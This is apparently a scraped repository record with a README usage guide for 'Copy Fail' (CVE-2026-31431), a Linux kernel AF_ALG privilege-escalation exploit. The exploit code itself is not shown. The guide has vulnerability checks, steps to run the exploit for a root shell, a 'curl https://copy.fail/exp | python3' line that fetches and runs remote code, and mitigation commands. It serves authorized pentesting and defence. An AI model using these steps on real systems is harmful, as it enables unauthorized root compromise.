[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-79896":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":14,"stars7d":14,"stars30d":15,"stars90d":14,"forks30d":14,"starsTrendScore":14,"compositeScore":16,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":17,"fork":17,"defaultBranch":18,"hasWiki":17,"hasPages":17,"topics":19,"createdAt":9,"pushedAt":9,"updatedAt":20,"readmeContent":21,"aiSummary":22,"trendingCount":14,"starSnapshotCount":14,"syncStatus":15,"lastSyncTime":23,"discoverSource":24},79896,"Copy-Fail-Exploit-CVE-2026-31431","painoob\u002FCopy-Fail-Exploit-CVE-2026-31431","painoob","Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw, it needs neither. The same 732-byte Python script (or .c elf) roots every Linux distribution shipped since 2017.",null,"Python",97,21,94,0,2,4.03,false,"main",[],"2026-06-12 02:03:55","# Copy Fail (CVE-2026-31431) – Exploit Usage Guide\n\n## ⚠️ Disclaimer\nThis content is for educational and authorized security testing purposes only. Do **NOT** run this on systems without explicit permission.\n\n---\n\n## 📌 Overview\n\n**Copy Fail (CVE-2026-31431)** is a Linux Local Privilege Escalation (LPE) vulnerability affecting the kernel crypto API via `AF_ALG`.\n\nIt allows an unprivileged user to overwrite page cache data of a SUID binary (e.g., `\u002Fusr\u002Fbin\u002Fsu`) and gain root access.\n\n---\n\n## 🧠 Requirements\n\n### System Requirements\n\n- Linux kernel (vulnerable – depends on patch status)\n- `AF_ALG` enabled\n- `algif_aead` module loaded\n\n### Python Exploit Requirements\n\n- Python **3.10+**\n- Support for:\n  - `os.splice`\n  - `socket(AF_ALG)`\n\n---\n\n## 🔍 Checking Vulnerability\n\n```bash\nuname -a\ngrep -i authencesn \u002Fproc\u002Fcrypto\nlsmod | grep alg\n```\n\nExpected indicators:\n\n- `authencesn(hmac(sha256),cbc(aes))`\n- `algif_aead` loaded\n\n---\n\n## 🐍 Running the Python Exploit\n\n### 1. Execute directly\n\n```bash\npython3 copy_fail_exp.py\n```\n\n### 2. Or via curl (if remote hosted)\n\n```bash\ncurl https:\u002F\u002Fcopy.fail\u002Fexp | python3\n```\n\n### 3. Trigger root shell\n\n```bash\nsu\nid\n```\n\nExpected result:\n\n```bash\nuid=0(root)\n```\n\n---\n\n## ⚠️ Common Issues (Python)\n\n### ❌ Error: `os.splice not found`\n\nCause:\n- Python version \u003C 3.10\n- Restricted build\n\nSolution:\n- Use a newer Python binary\n- Upload a static Python interpreter\n\n---\n\n## ⚙️ Compiling the C Version\n\n### 1. Compile\n\n```bash\ngcc copy_fail_exp.c -o copy_fail\n```\n\n### 2. Make executable\n\n```bash\nchmod +x copy_fail\n```\n\n### 3. Run exploit\n\n```bash\n.\u002Fcopy_fail\nsu\n```\n\n---\n\n## ⚠️ Common Issues (C)\n\n### ❌ Exploit runs but no root\n\nPossible causes:\n\n- Kernel patched\n- Incorrect offsets\n- Environment mismatch\n\n### ❌ Compilation errors\n\nInstall required tools:\n\n```bash\napt update && apt install build-essential\n```\n\n---\n\n## 🧪 Troubleshooting\n\n### Check if system is patched\n\n```bash\ndmesg | grep -i alg\n```\n\n### Verify module\n\n```bash\nlsmod | grep algif_aead\n```\n\n---\n\n## 🛡️ Mitigation\n\n### Disable vulnerable module\n\n```bash\necho \"install algif_aead \u002Fbin\u002Ffalse\" > \u002Fetc\u002Fmodprobe.d\u002Fdisable-algif.conf\nrmmod algif_aead\n```\n\n### Apply kernel patch\n\nUpdate your system:\n\n```bash\napt update && apt upgrade\n```\n\n---\n\n## 📌 Notes\n\n- Exploit modifies **page cache only** (non-persistent)\n- Requires local access\n- Not remotely exploitable by default\n\n---\n\n## 🧠 Final Insight\n\nIf the exploit fails, consider:\n\n- Kernel already patched\n- Environment restrictions\n- Alternate privilege escalation vectors (SUID, capabilities, sudo misconfig)\n\n---\n\n## 📚 References\n\n- https:\u002F\u002Fcopy.fail\u002F\n- CVE-2026-31431\n\n---\n\n## 👨‍💻 Author Notes\n\nUse this exploit responsibly in labs, CTFs, and authorized pentests only.\n","Copy Fail (CVE-2026-31431) 是一个针对 Linux 内核加密 API 的本地权限提升漏洞，通过 `AF_ALG` 接口实现。该项目提供了一个732字节的 Python 脚本或 C 语言编写的 ELF 文件，能够利用该漏洞在未打补丁的 Linux 系统上获得 root 权限，而无需依赖竞态条件或特定内核偏移量。适用于安全研究、渗透测试以及教育用途，特别是在需要验证系统安全性或进行授权测试的场景下。需要注意的是，使用此工具必须遵守相关法律法规，并且仅限于合法授权的环境中。","2026-06-11 03:58:26","CREATED_QUERY"]